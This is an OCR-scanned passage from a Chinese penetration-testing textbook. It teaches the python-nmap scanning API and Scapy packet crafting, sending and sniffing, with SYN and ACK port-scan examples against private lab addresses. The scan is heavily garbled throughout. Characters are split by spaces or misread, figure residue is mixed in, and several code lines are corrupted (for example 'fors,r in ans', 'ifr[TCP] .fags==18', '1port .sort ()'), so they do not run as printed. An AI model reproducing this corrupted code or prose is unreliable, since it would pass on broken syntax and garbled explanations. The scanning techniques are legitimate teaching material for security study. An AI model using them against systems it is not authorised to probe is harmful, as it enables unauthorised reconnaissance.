nmap.PortScannerAsync () 


执行 的 结果 如 图 4-7 所 示 


rt nmap 
nmap .PortScannerAsync() 


图 4-7 使 用 PortScannerAsync0 实例 化 


2. python- nm ap 模块 中 的 函数 

首先 看 一 下 PortScanner 类 ， 这 个 类 中 包含 如 下 几 个 函数 。 

scan() 函数 : 这 个 函数 的 完整 形式 为 scan(self hosts='127.0.0.1', ports=None, arguments='-sV', 
sudo=False)， 用 来 对 指定 目标 进行 扫描 ， 其 中 需要 设置 的 三 个 参数 包括 hosts, ports 和 
arguments. 


这 里 面 的 参数 hosts 的 值 为 字符 串 类 型 ,表示 要 扫描 的 主机 ， 形 式 可 以 是 他 地址 ， 例 如 


第 4 章 安全 渗透 测试 的 常见 模块 < 71 


“192.168.1.1”"， 也 可 以 是 一 个 域名 ,例如 “www.nmap.org” 

参数 ports 的 值 也 是 字符 串 类 型 ,表示 要 扫描 的 端口 。 如 果 要 扫描 的 是 单一 端口 ， 形 式 
可 以 为 “80”。 如 果 要 扫描 的 是 多 个 端口 ， 可 以 用 逗号 分 隔 开 ， 形 式 为 “80,443,8080”。 如 果 
要 扫描 的 是 连续 的 端口 范围 ， 可 以 用 横 线 ， 形 式 为 “1-1000”。 

参数 arguments 的 值 也 是 字符 串 类 型 ， 这 个 参数 实际 上 就 是 Nmap 扫描 时 所 使 用 的 参数 ， 
如 “-sP”“-PR?”“-SS”“-sST”“-0”“-SV” 等 。 这 里 “-sP” 表 示 对 目标 进行 Ping 主机 在 线 扫 
描 ,“-PR” 表 示 对 目标 进行 一 个 ARP 的 主机 在 线 扫描 ,“-sS” 表 示 对 目标 进行 一 个 TCP `É 
JF (SYN) 类 型 的 端口 扫描 ,“-sT” 表 示 对 目标 进行 一 个 TCP 全 开 类 型 的 端口 扫描 ,“ -0 
表示 扫描 目标 的 操作 系统 类 型 ,“-sSV” 表 示 扫 描 目 标 上 所 安装 网 络 服务 软件 的 版 本 

如 果 要 对 192.168.1.101 的 1 ~ 500 端口 进行 一 次 TCP 半 开 扫描 ， 可 以 使 用 如 图 4-8 所 


示 的 命令 


1-500','-sS') 


图 4-8 对 192.168.1.101 的 1 ~ 500 端口 进行 一 次 TCP 半 开 扫描 


all_hosts() 函数 : 返回 一 个 被 扫描 的 所 有 主机 列表 ， 如 图 4-9 所 示 


ll_hosts() 


nm.al 
[ '192 168.1.101'] 


图 4-9 返回 一 个 被 扫描 的 所 有 主机 列表 


command line() 函数 : 返回 在 当前 扫描 中 使 用 的 命令 行 ， 如 图 4-10 所 示 


>> nm.command line() 


"nmap -0X - -p 1-566 -sS 192.168.1.101' 
图 4-10 返回 在 当前 扫描 中 使 用 的 命令 
csv() 函数 : 返回 值 是 一 个 CSV (逗号 分 隔 值 文件 格式 ) 的 输出 ， 如 图 4-11 所 示 


图 4-11 返回 一 个 被 扫描 的 CSV 文件 
如 果 和 希望 看 得 更 清楚 一 些 ， 可 以 使 用 print 输出 csv0 的 内 容 ， 如 图 4-12 所 示 。 


图 4-12 用 print 输 出 csvO 
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has_host(self, host) 函数 : 检查 是 否 有 host 的 扫描 结果 ， 如 果 有 则 返回 True， 和 否则 返回 
False， 如 图 4-13 所 示 。 


图 4-13 检查 是 否 有 host 的 扫描 结果 
scaninfo() 函数 : 列 出 一 个 扫描 信息 的 结构 ， 如 图 4-14 所 示 。 


'1-500', 'method': 'syn')) 


El 4-14 列 出 一 个 扫描 信息 的 结构 


这 个 类 还 支持 如 下 的 操作 

nm['192.168.1.101'].hostname() # 获取 192.168.1.101 的 主机 名 ， 通常 为 用 户 记 录 

nm['192.168.1.101'].state() # 获取 主机 192.168.1.101 的 状态 (upldownlunknownlskipped) 

nm['192.168.1.101'].all_protocols() # 获取 执行 的 协议 [tcp', "mdp'] 包 含 (IPITCP| 
UDPISCTP) 

nm['192.168.1.101'] ['tcp'].keys() # 获取 TCP 所 有 的 端口 号 

nm[|'192.168.1.101'].all tcp() # 获取 TCP 所 有 的 端口 号 (按照 端口 号 大 小 进行 排序 )。 

nm['192.168.1.101'].all_udp() # 获取 UDP 所 有 的 端口 号 (按照 端口 号 大 小 进行 排序 ) 

nm['192.168.1.101'].all_sctp() # 获取 SCTP 所 有 的 端口 号 (按照 端口 号 大 小 进行 排序 ) 。 
nm['192.168.1.101'].has_tcp(22) # 主机 192.168.1.101 是 否 有 关于 22 端口 的 任何 信息 
nm['192.168.1.101'] ['tcp"][22] # 获取 主机 192.168.1.101 关于 22 端口 的 信息 
nm["192.168.1.101"].tcp(22)# 获取 主机 192.168.1.101 关于 22 端口 的 信息 。 
nm['192.168.1.101'] ['tcp'][22]['state'] # 获取 主机 22 端口 的 状态 (open) 

而 PortScannerAsync 类 中 最 为 重要 的 函数 也 是 scan()， 用 法 与 PortScanner 类 中 的 scan() 
基本 一 样 ， 但 是 多 了 一 个 回调 函数 。 完 整 的 scan0 函数 格式 为 scan(self hosts='127.0.0.1', 
ports=None, arguments='-sV', callback=None, sudo=False)， 这 里 面 的 callback 是 以 ( host, scan_ 
data) 为 参数 的 函数 ， 如 图 4-15 所 示 。 


图 4-15 对 目标 地 址 进行 一 次 扫描 


这 个 类 中 提供 了 以 下 三 个 用 来 实现 异步 的 函数 。 
still scanning(): 如 果 扫 描 正 在 进行 ， 则 返回 True， 和 否则 返回 False， 如 图 4-16 所 示 。 
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scanning( 


图 4-16 返回 扫描 的 状态 


wait(self timeout=None): 函数 表示 等 待 时 间 ， 如 图 4-17 所 示 。 


i 一段 时 间 
stop): 停止 当前 的 扫描 


3. 使 用 python- nm ap 模块 来 编写 一 个 扫描 器 

好 了 ， 现 在 已 经 了 解 python-nmap 的 用 法 ， 接 下 来 就 可 以 使 用 这 个 模块 来 编写 一 个 简单 
的 端口 扫描 器 。 扫 描 192.168.1.101 开放 从 1 ~ 1000 的 哪些 端口 ， 这 里 先 使 用 命令 行 来 完成 
这 个 程序 


>>> import nmap 

>>>nm = nmap.PortScanner() 

>>>nm. scan ('192.168.1.101', '1-1000') 

>>>for host in nm.all hosts(): 

POPRI esri "1 
>>>print('Host : %s (%s)' % (host, nm[host].hostname())) 
>>>print('State : %s' % nm[host].state()) 

>>>for proto in nm[host] .al1l_protocols () : 

S S 3 Sasu sas Su Toa ss Ton usus s A "J 
>>>print('Protocol : %s' % proto) 

>>>lport = nm[host] [proto] .keys () 

>>>1port .sort () 

>>>for port in lport: 

>>> print ('port : %s\tstate : %s' % (port, nm[host] [proto] [port] ['state'])) 


在 Python 中 的 命令 行 中 执行 这 个 程序 ， 图 4-18 中 方 框 内 显示 的 内 容 是 程序 执行 的 结果 。 


rootGuai: ~ cooo 


图 4-18 扫描 的 结果 
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在 命令 行 中 调试 程序 虽然 很 方便 ， 但 是 有 两 个 很 明显 的 缺点 ， 一 是 没有 办 法 保存 编写 的 
程序 ， 二 是 很 难 对 编写 程序 时 出 现 的 错误 进行 调试 。 所 以 从 第 5 章 开始 的 大 部 分 程序 都 会 在 
开发 工具 中 进行 


>>> import nmap 

>>>nm = nmap.PortScanner () 
>>>nm.scan(hosts='192.168.1.0/24',arguments='-sP') 

>>>hosts_list = [(x, nm[x] ['status']['state']) for x in nm.all_hosts()] 
>>>for host, status in hosts_list: 

>>>print (host+" is "+status) 


将 这 个 程序 在 命令 行 中 执行 得 到 的 


果 如 图 4-19 所 示 


>>> for host,s s in hosts list: 
is "+status) 


图 4-19 主机 状态 扫描 的 结果 
这 里 使 用 一 个 异步 程序 


>>>nma = nmap.PortScannerAsync() 

>>>defcallback result (host, scan result): 

>>> PM SSeS 

>>>print host, scan result 

>>>nma.scan(hosts='192.168.1.0/24', arguments='-sP', callback=callback result) 


把 这 段 程序 放 在 命令 行 中 执行 ， 得 到 的 结果 如 图 4-20 所 示 


allback result) 


Thu 0ct 12 00:03:55 201 
aninfo': (), 'command l 


192.168.1.1 ('nma a "up 'timestr': 'Thu Oct 12 00:03:55 
ae tota P '0.10'), 
rü 192.168.1.1': 
[(' type 3 
'addresses': ('mac' 


图 4-20 异步 扫描 的 结果 


在 使 用 scan 函数 扫描 的 过 程 中 会 执行 callback result 函数 ， 可 以 一 边 扫 描 一 边 输出 扫描 
的 结 


第 4 章 安全 渗透 测试 的 常见 模块 < 75 


4.3 Scapy 模块 文件 


Scapy 是 本 章 介绍 的 第 三 个 模块 文件 ， 相 比 起 前 两 个 模块 ， 它 已 经 在 内 部 实现 了 大 量 的 
网 络 协议 (DNS, ARP, IP, TCP, UDP 等 )， 可 以 用 它 来 编写 非常 灵活 、 实 用 的 工具 。 


4.3.1 简介 

Scapy 是 一 个 由 Python 语言 编写 的 强大 工具 ， 它 是 大 量程 序 编写 人 员 最 喜爱 的 一 个 网 
络 模块 。 目 前 很 多 优秀 的 网 络 扫描 和 攻击 工具 都 使 用 了 这 个 模块 。 也 可 以 在 自己 的 程序 中 使 
用 这 个 模块 来 实现 对 网 络 数据 包 的 发 送 、 监 听 和 解析 。 这 个 模块 相 比 起 Nmap yoa 更 为 底 
层 。 可 以 更 为 直观 地 了 解 到 网 络 中 的 各 种 扫描 和 攻击 行为 ， 例 如 ， 要 检测 某 一 个 端口 是 否 开 
放 ， 只 需 提供 给 Nmap 一 个 端口 号 ， 而 Nmap 就 会 给 出 一 Manasai 但 是 并 不 
知道 Nmap 是 怎么 做 的 。 如 果 想 对 网 络 中 的 各 种 问题 进行 深入 研究 ，Scapy 无 疑 是 一 个 更 好 
的 选择 ， 可 以 利用 它 来 产生 各 种 类 型 的 数据 包 并 发 送出 去 ，Scapy 也 只 会 把 收 到 的 数据 包 展 
示 给 你 ， 而 并 不 会 告诉 你 这 意味 着 什么 , 一切 都 将 由 你 来 判断 。 

例如 ， 当 你 去 医院 检查 身体 时 ， 医 院 会 给 s s nsn RR 而 医生 
也 会 告诉 你 得 了 什么 病 或 者 没有 任何 病 。 那 么 Nmap 就 像 是 一 个 医生 ， 它 会 蔡 你 搞定 一 切 ， 
按照 它 的 经 验 提供 给 你 结果 。 而 Scapy 则 像 是 一 个 体检 的 设备 ， 它 只 会 告诉 你 各 种 检查 的 结 
果 ， 如 果 你 自己 就 是 一 个 经 验 丰富 的 医生 ， 显 然 检查 的 结果 要 比 同 行 的 建议 更 值得 参考 。 


4.3.2 ”基本 用 法 

TE Kali Linux 2 中 已 经 集成 了 Scapy， 既 可 以 在 Python 环境 中 使 用 Scapy， 也 可 以 直接 
使 用 它 。 在 Kali Linux 2 中 启动 一 个 终端 ， 输 入 命令 “scapy”， 就 可 以 启动 Scapy 环境 ， 如 
图 4-21 所 示 。 


root@kali: ~ ooo 


File Edit 


图 4-21 启动 Scapy 环境 


Scapy 提供 了 和 Python 一 样 的 交互 式 命 令 行 。 这 里 需要 特别 强调 的 是 ， 虽 然 本 书 中 
Scapy 作为 Python 的 一 个 模块 存在 ,但 是 Scapy 本 身 就 是 一 个 可 以 运行 的 工具 ， 它 自己 具备 
一 个 独立 的 运行 环境 ， 因 而 可 以 不 在 Python 环境 下 运行 。 本 书 中 的 有 些 实例 (例如 本 节 中 
的 ) 就 是 在 这 个 环境 下 运行 起 来 的 ， 注 意 和 Python 的 运行 环境 区 分 开 来 。 
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1. Scapy 的 基本 操作 

首先 使 用 几 个 实例 来 演示 一 下 Scapy 的 用 法 ,在 Scapy 中 ,每 一 个 协议 就 是 一 个 类 。 只 
需要 实例 化 一 个 协议 类 ， 就 可 以 创建 一 个 该 协议 的 数据 包 。 例如， 如 果 要 创建 一 个 他 类 型 的 
数据 包 ， 就 可 以 使 用 如 下 命令 。 

>>>ip=IP() 

和 python 语法 相同 ,输入 变量 的 名 称 ， 就 可 以 查看 这 个 变量 的 内 容 ， 现 在 的 变量 jp 就 
是 一 个 卫 数据 包 ， 如 图 4-22 所 示 


图 4-22 卫 数 据 包 
IP 数据 包 最 重要 的 属性 就 是 源 地 址 和 目的 地 址 ， 这 两 个 属性 可 以 使 用 src 和 dst 来 设置 。 
例如 ， 要 构造 一 个 发 往 “192.168.1.101” 的 卫 数据 包 ， 可 以 使 用 如 下 语句 
>>>ip=IP (dst="192.168.1.101") 


执行 的 过 程 如 图 4-23 所 示 


图 4-23 查看 IP 数据 包 的 格式 


这 个 目标 dst 的 值 可 以 是 一 个 他 地 址 ， 也 可 以 是 一 个 他 范围 ， 例 如 192.168.1.0/24， 这 
时 产生 的 就 不 是 1 个 数据 包 ， 而 是 256 个 数据 包 。 这 个 过 程 如 图 4-24 所 示 


图 4-24 产生 192.168.1.0/24 范围 内 为 目的 地 址 的 数据 包 
如 果 要 查看 其 中 的 每 一 个 数据 包 ， 可 以 使 用 [p for p in ip]， 如 图 4-25 所 示 


[p for p in ip) 
[< =. 


图 4-25 查看 其 中 的 每 一 个 数据 包 
Scapy 采用 分 层 的 形式 来 构造 数据 包 ， 通 常 最 下 面 的 一 个 协议 为 Ether， 然 后 是 卫 ， 再 之 
后 是 TCP 或 者 是 UDP。IPO 函数 无 法 用 来 构造 ARP 请 求 和 应 答 数 据 包 ， 所 以 这 时 可 以 使 用 
Ether()， 这 个 函数 可 以 设置 发 送 方 和 接收 方 的 MAC 地 址 。 那 么 现在 来 产生 一 个 广播 数据 包 ， 
执行 的 命令 如 下 。 
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>>>Ether(dst="ff:ff:ff:ff:ff:ff") 
执行 的 结果 如 图 4-26 所 示 


Ether(dst="ff:ff:ff:ff:ff:ff") 


= | 
图 4-26 产生 一 个 广播 数据 包 
Scapy 中 的 分 层 通 过 符号 “/” 实 现 ， 一 个 数据 包 是 由 多 层 协议 组 合 而 成 ， 那 么 这 些 协 
议 之 间 就 可 以 使 用 “/” 分 开 ， 按 照 协议 由 底 而 上 的 顺序 从 左 向 右 排列 ， 例 如 ， 可 以 使 用 
Ether()/IPO/TCP0 来 完成 一 个 TCP 数据 包 ， 图 4-27 给 出 了 一 个 实例 


Ether()/IP()/TCP() 


m | 
图 4-27 产生 一 个 TCP 数据 包 
如 果 要 构造 一 个 HTTP 数据 包 ， 也 可 以 使 用 如 下 这 种 方式 
>>>IP()/TCP()/"GET / HTTP/1.0\r\n\r\n" 


构造 的 结果 如 图 4-28 所 示 


"GET/HTTP/1.0\r\n\r\n” 
= |< < 


图 4-28 产生 一 个 HTTP 数据 包 

Scapy 中 使 用 频率 最 高 的 类 要 数 Ether, IP, TCP 和 UDP， 但 是 这 些 类 都 具有 哪些 属性 

呢 ? Ether 类 中 显然 需要 有 源 地 址 、 目 的 地 址 和 类 型 。IP 类 的 属性 则 复杂 了 许多 ， 除 了 最 重 

要 的 源 地 址 和 目的 地 址 之 外 ， 还 有 版 本 、 长 度 、 协 议 类 型 、 校 验 和 等 ，TCP 类 中 需要 有 源 端 
口 和 目的 端口 。 这 里 可 以 使 用 1s() 函数 来 查看 一 个 类 所 拥有 的 属性 
例如 ,使 用 1s(Ether0) 来 查看 Ether 类 的 属性 ， 如 图 4-29 所 示 


图 4-29 查看 Ether 类 的 属性 


也 可 以 使 用 1s(IP0) 来 查看 IP 类 的 属性 ， 如 图 4-30 所 示 
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可 以 对 这 里 面 对 应 的 属性 进行 设置 ， 例 如 ,将 世 的 值 设 置 为 32， 可 以 使 用 如 下 方式 ， 
如 图 4-31 所 示 。 


>>>IP(src="192.168.1.1",dst="192.168.1.101",tt1=32) 


IP(src="192.168.1.1",dst="192.168.1.101",ttl=32) 


图 4-31 将 世 的 值 设 置 为 32 


2. 5capy 模 块 中 的 函数 

除了 这 些 对 应 着 协议 的 类 和 它们 的 属性 之 外 ， ENE LIP 
要 注意 的 一 点 是 ， 刚 才 使 用 IP() 的 作用 是 产生 了 一 个 全 数据 包 , 但 是 并 没有 将 其 发 送 wy 
因此 ， 现 在 首先 来 看 的 就 是 如 何 将 产生 的 报 文 发 送出 去 ，Scapy 中 提供 了 FARSAN 
数据 包 的 函数 ， 首 先 来 看 一 下 其 中 的 send() 和 sendp()。 这 两 个 函数 的 区 别 在 于 send) 工作 在 
第 三 层 ， 而 send) 工作 在 第 二 层 。 简 单 地 说 ，send() 是 用 来 发 送 IP 数据 包 的 ， 而 sendp() 是 
用 来 发 送 Ether 数据 包 的 

例如 ， 构造 一 个 目的 地 址 为 “192.168.1.101” 的 ICMP 数据 包 ， 并 将 其 发 送出 去 ， 可 以 
使 用 如 下 语句 

>>>send (IP (dst="192.168.1.101") /ICMP () ) 

执行 的 结果 如 图 4-32 所 示 


send(IP(dst="192.168.1.101")/ICMP()) 


Sent 1 packets 
图 4-32 使 用 send 发 送 一 个 数据 包 
， 如 果 这 个 数据 包 发 送 成 功 ， 下 方 会 有 一 个 “Sent 1 packets.” 的 显示 。 


>>>Sendp (Ether (dst="ff:ff:ff:ff:ff:ff")) 


执行 的 结果 如 图 4-33 所 示 。 


Sent 1 packets 


图 4-33 ”发 送 成 功 
需要 注意 的 是 ， 这 两 个 函数 的 特点 是 只 发 不 收 ， 也 就 是 说 只 会 将 数据 包 发 送出 去 ， 但 是 
没有 能 力 处 理 该 数据 包 的 回应 包 。 
如 果 和 看望 发 送 一 个 内 容 是 随机 填充 的 数据 包 ， 而 且 又 要 保证 这 个 数据 包 的 正确 性 ， 那 么 
可 以 是 名 zz(0) 函数 。 例 如 ， 可 以 使 用 如 下 命令 来 创建 一 个 发 往 192.168.1.101 的 TCP 数据 包 。 
>>>IP (dst='192.168.1.101')/fuzz(TCP()) 


执行 的 结果 如 图 4-34 所 示 。 
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IP(dst='192.168.1.101')/fuzz(TCP()) 
< = = |< 


图 4-34 创建 一 个 发 往 192.168.1.101 的 TCP 数据 包 

外 需要 做 的 不 仅 是 将 创建 好 的 数据 包 发 送出 去 ， 也 需要 接收 这 些 数 
据 包 的 应 答 数据 包 ， 这 一 点 在 网 络 扫描 中 尤为 重要 。 在 Scapy 中 提供 了 三 个 上 es 
数据 包 的 函数 ， dd n ss TJ lI IP 和 
ARP 等 。 而 sp) 用 于 第 二 层 。 

这 里 仍然 癌 192.168.1.101 发 送 一 个 ICMP 数据 包 来 比较 一 下 sr() 和 send() 的 区 别 

>>>sr (IP(dst="192.168.1.101")/ICMP()) 


执行 的 结果 如 图 4-35 所 示 


ning 0 packets 


图 4-35 使 用 sr0 发 送 数据 包 
当 产 生 的 数据 包 发 送出 去 之 后 ，Scapy 就 会 监听 接收 到 的 数据 包 ， 并 将 其 中 对 应 的 应 答 
数据 包 筛选 出 来 ， 显 示 在 下 面 。Reveived 表示 收 到 的 数据 包 个 数 ，answers 表示 对 应 的 应 答 
数据 包 ， 
sr() 函数 是 Scapy 的 核心 ， 它 的 返回 值 是 两 个 列表 ， 个 列表 是 收 到 了 应 答 的 包 和 对 
应 的 应 答 ， 第 二 个 列表 是 未 收 到 应 答 的 包 。 所 ep sr() 的 返回 值 ， 妇 
图 4-36 所 示 


168.1.102")/ICMP()) 


0 ==> IP / ICMP 192.168.1 


图 4-36 srO 函数 的 返回 值 


这 里 面 使 用 ans A unans 来 保存 sr() 的 返回 值 ， 因 为 发 出 去 的 是 一 个 ICMP 的 请 求 数据 
包 ， 而 且 也 收 到 了 一 个 应 答 包 ， 所 以 这 个 发 送 的 数据 包 和 收 到 的 应 答 包 都 被 保存 到 了 ans 列 
表 中 ， 使 用 ans. w. 可 以 查看 两 个 数据 包 的 内 容 ， 而 unans 列表 为 空 

sr1() 函数 跟 sr() 函数 作用 基本 一 样 ， 但 是 只 返回 一 个 应 答 的 包 。 只 需要 使 用 一 个 列表 就 
可 以 保存 这 个 函数 的 返回 值 。 例如， 使 用 p 来 保存 sr1(IP(dst="192.168.1.102")ICMP()) 的 返 
回 值 ， 如 图 4-37 所 示 。 
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P(dst="192.168.1.102")/ICMP()) 


ion 
to send 1 packets 


1 packets, got 1 answers, remaining 0 packets 


图 4-37 sr10 的 返回 值 
可 以 利用 sr10 函数 来 测试 目标 的 某 个 端口 是 否 开放 ， 采 用 半 开 扫描 (SYN) 的 办 法 
>>>sr1 (IP (dst="192.168.1.102") /TCP (dport=80,flags="S")) 
执行 的 结果 如 图 4-38 所 示 


192.168.1.1")/TCP(dport=80, flai 
nd 1 packet 


1 packets, got 1 an 


图 4-38 测试 目标 的 某 个 端口 是 否 开放 
MEH p 的 值 可 以 看 出 来 ，192.168.1.1 回应 了 发 出 的 设置 了 SYN 标志 位 的 TCP 数据 包 ， 
这 表明 这 台 主 机 的 80 端口 是 开放 的 
另外 一 个 十 分 重要 的 函数 是 sniff()， 如 果 读 者 使 用 过 Tcepdump， 那 么 对 这 个 函数 的 使 用 
就 不 会 感到 陌生 。 通 过 这 个 函数 可 以 在 自己 的 程序 中 捕获 经 过 本 机 网 卡 的 数据 包 ， 如 图 4-39 
所 示 


图 4-39 使 用 sniffO 捕获 网 络 中 的 数据 包 


使 用 sniff() 开始 监听 ,但 是 捕获 的 数据 包 不 会 即时 显示 ， 只 有 当 使 用 CtrltC 组 合 键 停 
止 监听 时 ， 才 会 显示 捕获 的 数据 包 。 例 如 ,在 上 面 的 例子 中 就 捕获 到 12 个 ICMP 类 型 的 数 
据 包 

这 个 函数 最 强大 的 地 方 在 于 可 以 使 用 参数 filter 对 数据 包 进 行 过 滤 。 例 如 ， 指 定 只 捕获 
与 192.168.1.102 有 关 的 数据 包 ， 可 以 使 用 “host 192.168.1.102”: 

>>>sniff (filter=" host 192.168.1.102") 

同样 ， 也 可 以 使 用 filter 来 过 滤 指 定 协议 , 例如 ，icmp 类 型 的 数据 包 : 


>>>sniff (filter="icmp") 
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如 果 要 同时 满足 多 个 条 件 可 以 使 用 “ “or” 等 关系 运算 符 来 表达 : 
>>>sniff (filter=" host 192.168.1.102 and icmp") 
另外 ， 两 个 很 重要 的 参数 是 iface count, iface 可 以 用 来 指定 所 要 进行 监听 的 网 卡 ， 例 如 ， 
指定 ethl 作为 监听 网 卡 ， 就 可 以 使 用 : 

>>> sniff(iface="ethl") 

而 count 则 用 来 指定 监听 到 数据 包 的 数量 ， 达 到 指定 的 数量 就 会 停止 监听 , 例如， 只 希 
望 监听 到 三 个 数据 包 就 停止 : 

>>> sniff(count=3) 

现在 设计 一 个 综合 性 的 监听 器 ， 
192.168.1.102 的 icmp 数据 包 ， 当 收 到 了 三 个 这 
Scapy 中 创建 如 下 监听 器 : 

>>> sniff (filter="icmp and host 192.168.1.102", count=3, iface="eth0") 

正常 情况 下 ， 是 不 会 有 去 往 或 者 来 自 192.168.1.102 的 icmp 数据 包 的 ， 所 以 这 时 候 可 以 
打开 一 个 新 的 终端 ， 然 后 在 里 面 执行 命令 “ping 192.168.1.102”"， 如 图 4-40 所 示 


root@kali: ~ ee 


它 会 在 网 卡 eth0 上 监听 源 地 址 或 者 目的 地 址 为 
样 的 数据 包 之 后 ， 就 会 停止 监听 。 首 先 在 


File Edit View Search Terminal Help 
# ping 192. 168.1.102 
1 


图 4-40 ”执行 命令 “ping 192.168.1.102” 


然后 在 Scapy 中 使 用 组 合 键 Ctrl+C 结束 捕获 ， 这 时 可 以 看 到 已 经 捕获 到 三 个 数据 包 ， 如 


图 4-41 所 示 


:Count=3, i 


sniff(filter="icmp and host 192.168.1.102 


rdInterrupt 


图 4-41 使 用 sniff0 捕获 网 络 中 的 ICMP 数据 包 


如 果 需 要 查看 这 三 个 数据 包 内 容 ， 可 以 使 用 “_”， 在 Scapy 中 这 个 符号 表示 是 上 一 条 语 
句 执 行 的 结果 ， 例 如 刚刚 使 用 sni 任 捕获 到 的 数据 包 ， 就 可 以 用 “_” 表 示 。 


>>>a=_ 
>>>a.nsummary () 


82 2> Python 渗透 测试 编程 技术 : 方法 与 实践 


执行 的 结果 如 图 4-42 所 示 。 


图 4-42 使 用 a.nsummary0 查看 捕获 到 的 数据 包 


刚刚 使 用 过 的 函数 pktsummary() 用 来 以 摘要 的 形式 显示 pkt 的 内 容 ， 这 个 摘要 的 长 度 为 
一 行 。 


>>> p=IP (dst="www.baidu.com") 
>>>p. summary () 
"192.168.169.130 >Net ('www.baidu.com') hopopt" 


函数 pkt.nsummary() 的 作用 与 pkt.summary() 相同 ， 只 是 要 操作 的 对 象 是 多 个 数据 包 。 


3. S capy 模 块 的 常用 简单 实例 

由 于 Scapy 功能 极为 强大 ， 可 以 构造 目前 各 种 常见 协议 类 型 的 数据 包 ， 因 此 几乎 可 以 使 
用 这 个 模块 完成 各 种 任务 ， 下 面 先 来 查看 一 些 简单 的 应 用 

使 用 Scapy 来 实现 一 次 ACK 类 型 的 端口 扫描 ， 例 如 ， 对 192.168.1.102 的 21、23 、135、 
443. 445 这 5 个 端口 是 否 被 屏蔽 进行 扫描 ， 注 意 是 屏蔽 不 是 关闭 ， 采 用 ACK 扫描 模式 ， 可 
以 构造 如 下 的 命令 方式 

>>>ans,unans = sr (IP (dst="192.168.1.102")/TCP (dport=[21, 23, 135, 443, 445] ,flags="A")) 


执行 的 结果 如 图 4-43 所 示 


168.1.192")/TCP(dport=[ 


图 4-43 一 次 ACK 类 型 的 端口 扫描 


正常 的 时 候 ， 如 果 一 个 开放 的 端口 会 回应 ack 数据 包 ， 而 关闭 的 端口 会 回应 rst 数据 包 。 


在 网 络 中 ,一 些 网 络 安全 设备 会 过 滤 掉 一 部 分 端口 ， 这 些 端 口 不 会 响应 来 自 外 界 的 数据 包 ， 
一 切 发 往 这 些 端口 的 数据 包 都 如 同 石沉大海 。 注 意 这些 端 口 的 状态 并 非 是 开放 或 者 关闭 ， 而 
是 被 屏蔽 。 这 是 一 种 网 络 安全 管理 经 常会 用 到 的 方法 。 

向 目标 发 送 了 5 个 标志 位 置 为 “A” 的 TCP 数据 包 。 按 照 TCP 三 次 握手 的 规则 ， 如 果 
目标 端口 没有 被 过 滤 ， 发 出 的 数据 包 就 会 得 到 回应 ， 否 则 没有 回应 。 另 外 ， 根 据 Scapy 的 设 
TF, ans 列表 中 的 数据 包 就 是 得 到 了 回应 的 数据 包 ， 而 unans 中 的 则 是 没有 得 到 回应 的 数据 
包 ， 只 需要 分 两 次 来 读 取 这 两 个 列表 就 可 以 得 到 端口 的 过 滤 结果 。 

首先 查看 未 被 过 滤 的 端口 : 
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>>>fors,r in ans: 
. if s[TCP] .dport == r[TCP] .sport: 
. print str(s[TCP] .dport) + " is unfiltered" 


也 可 以 用 类 似 的 方法 来 查看 被 过 滤 的 端口 : 


>>>for s in unans: 
. print str(s[TCP].dport) + " is filtered" 


下 面 在 Python 中 编写 程序 来 实现 一 个 查看 端口 是 否 被 屏蔽 的 简单 程序 。 首 先导 和 需要 
使 用 的 scapy 模块 中 的 函数 : 
>>>from scapy.all import IP,TCP, sr 
这 里 需要 IPO 和 TCP() 来 产生 所 需要 的 数据 包 ，sr() 函数 来 发 送 ， 然 后 发 送 构造 好 的 数 
据 包 ， 在 Python 交互 式 命令 行 中 执行 这 个 程序 的 结果 如 图 4-44 所 示 


CP,s 
168. 1. 162")/TCP(dport=[21,23,135,443,445],fLags="A") 


vers, remaining 0 packets 


[TCP] .sport 
port "+str(s[TCP].dport)+" is unfiltered 


图 4-44 一 个 查看 端口 是 否 被 屏蔽 的 简单 程序 

下 面 使 用 Scapy 强大 的 包 处 理 功 能 来 设计 一 个 端口 是 否 开 放 的 扫描 器 。 注 意 ， 这 里 还 是 
要 注意 和 前 面 例子 的 区 别 ， 如 果 一 个 端口 处 于 屏蔽 状态 ， 那 么 它 将 不 会 产生 任何 响应 报 文 。 
如 果 一 个 端口 处 于 开放 状态 ,那么 它 在 收 到 syn 数据 包 之 后 ， 就 会 回应 一 个 ack 数据 包 。 反 
之 ， 如 果 一 个 端口 处 于 关闭 状态 ， 那 么 它 在 收 到 syn 数据 包 之 后 ， 就 会 回应 一 个 rst 数据 包 。 

首先 在 Kali Linux 2 中 启动 一 个 终端 ， 在 终端 中 打开 Python a eh 
件 ， 这 次 需要 使 用 IPO. TCPO 来 创建 数据 包 ， 使 用 fuzz() 来 填充 数据 包 ， 使 用 sr() 来 发 送 
据 包 。 很 多 书 中 的 例子 中 都 没有 使 用 fuzz() 来 填充 数据 包 ， pa ee ire 不 
响应 ， 从 而 无 法 对 目标 端口 的 状态 进行 判断 。 


>>> from scapy.all import fuzz,TCP,IP, sr 

接 下 来 产生 一 个 目标 为 “192.168.1.1” 的 80 端口 的 syn 数据 包 ， 将 标志 位 设置 为 “S” 

>>>ans,unans = sr(IP(dst="192.168.1.1")/fuzz (TCP (dport=80,flags="S"))) 

接 下 来 使 用 循环 来 查看 ， 如 果 r[TCP].iags 一 18， 则 表示 返回 数据 包 flags 的 值 为 0x012 
(SYN，ACK)， 目 标 端口 为 开放 状态 。 如 果 r[TCP].Hags==20， 则 表示 返回 数据 包 flags 的 值 
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为 0x014(RSTACK)， 目 标 端口 为 关闭 状态 。 


>>>fors,r in ans: 
ifr[TCP] .fags==18: 
print "This port is Open" 
ifr [TCP] .flags==20: 
print "This port is Closed" 


接 下 来 在 Python 的 交互 式 命令 行 中 执行 这 个 程序 ， 如 图 4-45 所 示 。 


got 1 answers, remaining 0 p 


pr 
if r[TCP] 
print "this port is closed" 


this port is open 


图 4-45 一 个 简单 的 端口 扫描 器 


小 结 


章 介 绍 了 几 个 网 络 安全 渗透 测试 中 所 需要 
测试 的 第 一 个 步骤 : 信息 的 搜集 


要 的 模块 ， 在 第 5 章 中 将 会 开始 网 络 安全 渗透 


weee 0D 


这 里 的 “情报 ” 指 的 是 目标 网 络 、 服 务 器 、 应 用 程序 的 所 有 信息 。 渗 透 测试 人 员 需 要 使 
用 资源 尽 可 能 地 获取 要 测试 目标 的 相关 信息 。 如 果 现 在 采用 了 黑 盒 测 试 的 方式 ， 那 么 这 个 阶 
段 可 以 说 是 整个 渗透 测试 过 程 中 最 为 重要 的 一 个 阶段 。 所 谓 “ 知 已 知 彼 ， 百 战 不 至 ”也 正 是 
说 明了 情报 收集 的 重要 性 。 

